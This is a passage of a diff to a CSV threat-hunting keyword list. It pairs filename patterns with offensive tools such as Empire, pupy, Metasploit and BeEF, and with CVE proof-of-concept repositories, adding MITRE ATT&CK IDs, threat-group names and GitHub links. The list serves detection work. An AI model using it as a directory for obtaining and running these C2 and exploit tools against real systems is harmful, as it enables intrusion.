tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*exploit_kctf.c*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*exploit_oneline.md*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" -"*exploit_suggester *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*exploit_suggester *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*exploit_suggester.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*exploit_suggester.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*exploit_suggester.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*Exploitation Toolkit*","offensive_tool_keyword","PRT","PRET is a new tool for printer security testing developed in the scope of a Masters Thesis at Ruhr University Bochum. It connects to a device via network or USB and exploits the features of a given printer language. Currently PostScript. PJL and PCL are supported which are spoken by most laser printers. This allows cool stuff like capturing or manipulating print jobs. accessing the printers file system and memory or even causing physical damage to the device. All attacks are documented in detail in the Hacking Printers Wiki. The main idea of PRET is to facilitate the communication between the end-user and the printer. Thus. after entering a UNIX-like command. PRET translates it to PostScript. PJL or PCL. sends it to the printer. evaluates the result and translates it back to a user-friendly format. 
PRET offers a whole bunch of commands useful for printer attacks and fuzzing","T1210.001 - T1027.002 - T1003 - T1505 - T1564.001","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/RUB-NDS/PRT","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*exploit-database-bin-sploits/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*Exploit-JBoss -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - 
CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Exploit-JBoss.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Exploit-JBoss.ps1*","offensive_tool_keyword","empire","Empire scripts paths. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Exploit-Jenkins*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-Jenkins.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Exploit-Jenkins.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Exploit-JMXConsole*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*exploits*_csrf/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*exploits*_csrf/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*exploits/*_macro*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*exploits/CVE-*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Exploit-JBoss -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exploit-JBoss.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exploit-JBoss.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exploit-Jenkins*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-Jenkins.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exploit-Jenkins.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Exploit-JMXConsole*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*exploits*_csrf/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*exploits*_csrf/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*exploits/*_macro*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*exploits/CVE-*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security 